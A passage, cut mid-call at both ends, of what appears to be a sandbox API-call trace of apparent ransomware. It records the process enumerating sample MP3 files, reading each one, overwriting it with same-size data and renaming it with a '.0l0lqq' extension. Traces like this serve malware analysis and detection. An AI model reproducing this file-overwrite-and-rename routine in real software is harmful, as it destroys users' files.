cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0247.687] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0247.687] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0247.687] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0247.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0247.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0247.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.692] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0247.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0248.392] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0248.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0248.392] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0248.394] GetFileType (hFile=0x538) returned 0x1 [0248.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0248.394] GetFileType (hFile=0x538) returned 0x1 [0248.394] WriteFile (in: hFile=0x538, lpBuffer=0x3276150*, nNumberOfBytesToWrite=0x8064f1, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x3276150*, lpNumberOfBytesWritten=0x26dd1c*=0x8064f1, lpOverlapped=0x0) returned 1 [0248.576] CloseHandle (hObject=0x538) returned 1 [0248.837] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0248.837] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.0l0lqq", lpFilePart=0x0) returned 0x35 [0248.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0248.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x655d0390, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1)) returned 1 [0248.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0248.838] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.0l0lqq" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.0l0lqq")) returned 1 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.842] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.843] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.844] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.844] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0248.844] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0248.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0248.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0248.844] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x6d99aa0 | out: lpFileInformation=0x6d99aa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0248.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0248.844] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.844] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0248.844] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0248.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0248.845] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.848] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.848] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0248.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0248.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0248.849] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0248.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x6d9d010 | out: lpFileInformation=0x6d9d010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0248.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0248.849] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0248.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x6d9d12c | out: lpFileInformation=0x6d9d12c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0248.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0248.850] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0248.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0248.850] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0248.851] GetFileType (hFile=0x538) returned 0x1 [0248.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0248.851] GetFileType (hFile=0x538) returned 0x1 [0248.851] GetFileSize (in: hFile=0x538, lpFileSizeHigh=0x26dd80 | out: lpFileSizeHigh=0x26dd80*=0x0) returned 0x3ec5d2 [0248.851] ReadFile (in: hFile=0x538, lpBuffer=0x3a7c660, nNumberOfBytesToRead=0x3ec5d2, lpNumberOfBytesRead=0x26dd2c, lpOverlapped=0x0 | out: lpBuffer=0x3a7c660*, lpNumberOfBytesRead=0x26dd2c*=0x3ec5d2, lpOverlapped=0x0) returned 1 [0248.923] CloseHandle (hObject=0x538) returned 1 [0249.262] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0249.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0249.262] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0249.289] GetFileType (hFile=0x538) returned 0x1 [0249.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0249.290] GetFileType (hFile=0x538) returned 0x1 [0249.290] WriteFile (in: hFile=0x538, lpBuffer=0x8569bb8*, nNumberOfBytesToWrite=0x3ec5d2, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x8569bb8*, lpNumberOfBytesWritten=0x26dd1c*=0x3ec5d2, lpOverlapped=0x0) returned 1 [0249.365] CloseHandle (hObject=0x538) returned 1 [0249.472] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0249.472] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.0l0lqq", lpFilePart=0x0) returned 0x47 [0249.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0249.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65be9bf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0249.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0249.473] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.0l0lqq" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.0l0lqq")) returned 1 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0249.479] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x26dde8, 